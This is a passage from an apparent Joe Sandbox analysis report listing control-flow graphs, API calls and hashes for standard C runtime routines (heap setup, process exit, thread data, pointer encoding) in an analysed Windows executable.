                                                      • Part of subcall function 0052143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00521454
                                                    • ExitProcess.KERNEL32 ref: 00521476
                                                    Memory Dump Source
                                                    • Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true
                                                    • Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                    • String ID:
                                                    • API String ID: 2427264223-0
                                                    • Opcode ID: c2f7e88e0337a93cbda190074a0c97d252aa7fe54ded05569c29d36c851e0302
                                                    • Instruction ID: 7d15b3dac179b583afb3bc704629b05945bb48f337c2686eb5660a63b6e54a4c
                                                    • Opcode Fuzzy Hash: c2f7e88e0337a93cbda190074a0c97d252aa7fe54ded05569c29d36c851e0302
                                                    • Instruction Fuzzy Hash: 8DB04831000108BB9B162B52EC0E95A3F2AFE923A0B608021F808490619E72A99AAA94

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 19 52261b-52263d HeapCreate 20 522641-52264a 19->20 21 52263f-522640 19->21
                                                    APIs
                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00522630
                                                    Memory Dump Source
                                                    • Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true
                                                    • Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd
                                                    Similarity
                                                    • API ID: CreateHeap
                                                    • String ID:
                                                    • API String ID: 10892065-0
                                                    • Opcode ID: 4b6609bff68e0d3c7c9b96a6d3ca35f91c8152f40eda862763eb700c8dd9363c
                                                    • Instruction ID: e551f8225467f7f8301666e4a2d474a87658f013a6261d720eaf7082ef5265a7
                                                    • Opcode Fuzzy Hash: 4b6609bff68e0d3c7c9b96a6d3ca35f91c8152f40eda862763eb700c8dd9363c
                                                    • Instruction Fuzzy Hash: 01D097325403046EEB205FB07C487323BDCDB81394F004031B80CC61A0FA30D58AEA00

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 22 521681-52168d call 521555 24 521692-521696 22->24
                                                    APIs
                                                    • _doexit.LIBCMT ref: 0052168D
                                                      • Part of subcall function 00521555: __lock.LIBCMT ref: 00521563
                                                      • Part of subcall function 00521555: __decode_pointer.LIBCMT ref: 0052159A
                                                      • Part of subcall function 00521555: __decode_pointer.LIBCMT ref: 005215AF
                                                      • Part of subcall function 00521555: __decode_pointer.LIBCMT ref: 005215D9
                                                      • Part of subcall function 00521555: __decode_pointer.LIBCMT ref: 005215EF
                                                      • Part of subcall function 00521555: __decode_pointer.LIBCMT ref: 005215FC
                                                      • Part of subcall function 00521555: __initterm.LIBCMT ref: 0052162B
                                                      • Part of subcall function 00521555: __initterm.LIBCMT ref: 0052163B
                                                    Memory Dump Source
                                                    • Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true
                                                    • Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd
                                                    Similarity
                                                    • API ID: __decode_pointer$__initterm$__lock_doexit
                                                    • String ID:
                                                    • API String ID: 1597249276-0
                                                    • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                    • Instruction ID: 0b8fb0a2f744a60dbebed121ff6820c9db863bf3ede462ff3fedc7e060ced9c5
                                                    • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                    • Instruction Fuzzy Hash: C4B0923268020833DB202586AC07F063E099BD1BA0E250060FA0C191E1A9A2A961848A

                                                    Control-flow Graph

                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00521346
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0052135B
                                                    • UnhandledExceptionFilter.KERNEL32(0052816C), ref: 00521366
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00521382
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00521389
                                                    Memory Dump Source
                                                    • Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true
                                                    • Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: 124cb3a2253074296656943a4d5fa645bee9952b8d8c2ad055c5ea0b8c5c4272
                                                    • Instruction ID: f7b185eb7415afe67b3561c4999b9e2500f723a683a962ce5284a8b5dc826ca1
                                                    • Opcode Fuzzy Hash: 124cb3a2253074296656943a4d5fa645bee9952b8d8c2ad055c5ea0b8c5c4272
                                                    • Instruction Fuzzy Hash: E321C0B4401204DFC730DF64FD486543BB0BF7A352F40441AE50896AA1EBB4598EEF46

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00529458,0000000C,00522320,00000000,00000000,?,0052174F,00000003,?,?,?,?,?,?,005210F6), ref: 005221F7
                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 00522202
                                                      • Part of subcall function 005213E1: Sleep.KERNEL32(000003E8,00000000,?,00522148,KERNEL32.DLL,?,00522194,?,0052174F,00000003), ref: 005213ED
                                                      • Part of subcall function 005213E1: GetModuleHandleW.KERNEL32(?,?,00522148,KERNEL32.DLL,?,00522194,?,0052174F,00000003,?,?,?,?,?,?,005210F6), ref: 005213F6
                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0052222B
                                                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0052223B
                                                    • __lock.LIBCMT ref: 0052225D
                                                    • InterlockedIncrement.KERNEL32(0052A4D8), ref: 0052226A
                                                    • __lock.LIBCMT ref: 0052227E
                                                    • ___addlocaleref.LIBCMT ref: 0052229C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true
                                                    • Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                    • API String ID: 1028249917-2843748187
                                                    • Opcode ID: 88ca8f35fcf584ff5609a6f61fe02c7c5b1e45beb6ae20f119cd119e8ca5d249
                                                    • Instruction ID: 585bbe31674c47d3f134875ee232f8f9436feb04c62a23b674d227362160da52
                                                    • Opcode Fuzzy Hash: 88ca8f35fcf584ff5609a6f61fe02c7c5b1e45beb6ae20f119cd119e8ca5d249
                                                    • Instruction Fuzzy Hash: 4A110575801711EFD720EFB5F849B5ABFE0BF66310F104419E499932E0CB70A905CB24

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 170 5240a0-5240bb call 52264c call 522345 175 5240da-5240f2 call 522aa0 170->175 176 5240bd-5240c1 170->176 181 5240f4-5240f6 175->181 182 52412a-524136 call 52413b 175->182 176->175 178 5240c3 176->178 180 5240c6-5240c8 178->180 183 5240d2-5240d9 call 522691 180->183 184 5240ca-5240d1 call 521411 180->184 185 524112-524124 InterlockedIncrement 181->185 186 5240f8-524101 InterlockedDecrement 181->186 182->180 184->183 185->182 186->185 190 524103-524109 186->190 190->185 194 52410b-524111 call 5235ee 190->194 194->185
                                                    APIs
                                                    • __getptd.LIBCMT ref: 005240AC
                                                      • Part of subcall function 00522345: __getptd_noexit.LIBCMT ref: 00522348
                                                      • Part of subcall function 00522345: __amsg_exit.LIBCMT ref: 00522355
                                                    • __amsg_exit.LIBCMT ref: 005240CC
                                                    • __lock.LIBCMT ref: 005240DC
                                                    • InterlockedDecrement.KERNEL32(?), ref: 005240F9
                                                    • InterlockedIncrement.KERNEL32(02612B98), ref: 00524124
                                                    Memory Dump Source
                                                    • Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true
                                                    • Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                    • String ID:
                                                    • API String ID: 4271482742-0
                                                    • Opcode ID: 7bc29f8b56881866da83fe5638528260a49ef367cf103777b1abeea050427959
                                                    • Instruction ID: ff8ea031daf7d303b3db74c8fbf25aa7cd464533700557058a8598f74a4c1f61
                                                    • Opcode Fuzzy Hash: 7bc29f8b56881866da83fe5638528260a49ef367cf103777b1abeea050427959
                                                    • Instruction Fuzzy Hash: 0201E136901632E7CB25AF65B40A35D7F60BF63710F004004F900AB2D1CB346996DFD2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 197 5235ee-5235ff call 52264c 200 523601-523608 197->200 201 523676-52367b call 522691 197->201 202 52360a-523622 call 522aa0 call 5245e4 200->202 203 52364d 200->203 215 523624-52362c call 524614 202->215 216 52362d-52363d call 523644 202->216 205 52364e-52365e HeapFree 203->205 205->201 208 523660-523675 call 522c72 GetLastError call 522c30 205->208 208->201 215->216 216->201 222 52363f-523642 216->222 222->205
                                                    APIs
                                                    • __lock.LIBCMT ref: 0052360C
                                                      • Part of subcall function 00522AA0: __mtinitlocknum.LIBCMT ref: 00522AB6
                                                      • Part of subcall function 00522AA0: __amsg_exit.LIBCMT ref: 00522AC2
                                                      • Part of subcall function 00522AA0: EnterCriticalSection.KERNEL32(?,?,?,00525600,00000004,00529628,0000000C,00523746,?,?,00000000,00000000,00000000,?,005222F7,00000001), ref: 00522ACA
                                                    • ___sbh_find_block.LIBCMT ref: 00523617
                                                    • ___sbh_free_block.LIBCMT ref: 00523626
                                                    • HeapFree.KERNEL32(00000000,?,00529568,0000000C,00522A81,00000000,005294C8,0000000C,00522ABB,?,?,?,00525600,00000004,00529628,0000000C), ref: 00523656
                                                    • GetLastError.KERNEL32(?,00525600,00000004,00529628,0000000C,00523746,?,?,00000000,00000000,00000000,?,005222F7,00000001,00000214), ref: 00523667
                                                    Memory Dump Source
                                                    • Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true
                                                    • Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 2714421763-0
                                                    • Opcode ID: c101eef4cea032c363b44ec128d434b127f07bbf9b9513b6b5b3391863f9d425
                                                    • Instruction ID: dd016090a0fc12ee7d3dea81afded4f07daee0792afd9a2cf8b8ae5bd47228ed
                                                    • Opcode Fuzzy Hash: c101eef4cea032c363b44ec128d434b127f07bbf9b9513b6b5b3391863f9d425
                                                    • Instruction Fuzzy Hash: 84018F35D05326BADB306BB0BC0EB5E3E68BF53720F604009F100662D1CF38AA44DA58

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 223 523e04-523e1f call 52264c call 522345 228 523e43-523e6c call 522aa0 call 523dc6 call 523e6e 223->228 229 523e21-523e25 223->229 237 523e2f-523e31 228->237 229->228 231 523e27-523e2c call 522345 229->231 231->237 239 523e33-523e3a call 521411 237->239 240 523e3b-523e42 call 522691 237->240 239->240
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00523E10
                                                      • Part of subcall function 00522345: __getptd_noexit.LIBCMT ref: 00522348
                                                      • Part of subcall function 00522345: __amsg_exit.LIBCMT ref: 00522355
                                                    • __getptd.LIBCMT ref: 00523E27
                                                    • __amsg_exit.LIBCMT ref: 00523E35
                                                    • __lock.LIBCMT ref: 00523E45
                                                    Memory Dump Source
                                                    • Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true
                                                    • Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                    • String ID:
                                                    • API String ID: 3521780317-0
                                                    • Opcode ID: 6db29e74f58c190f5ffd50dd11499b0b6fdf30026ade0d060f240f95f90e6dd8
                                                    • Instruction ID: 00e3aa9cbbf24f41b93e2456368aa404a02ce44f877821177c9948f063c21770
                                                    • Opcode Fuzzy Hash: 6db29e74f58c190f5ffd50dd11499b0b6fdf30026ade0d060f240f95f90e6dd8
                                                    • Instruction Fuzzy Hash: 3AF06D36A007329BD720FB74B40A74D7BA4BF96B10F114559A441972E1CF789A46CA52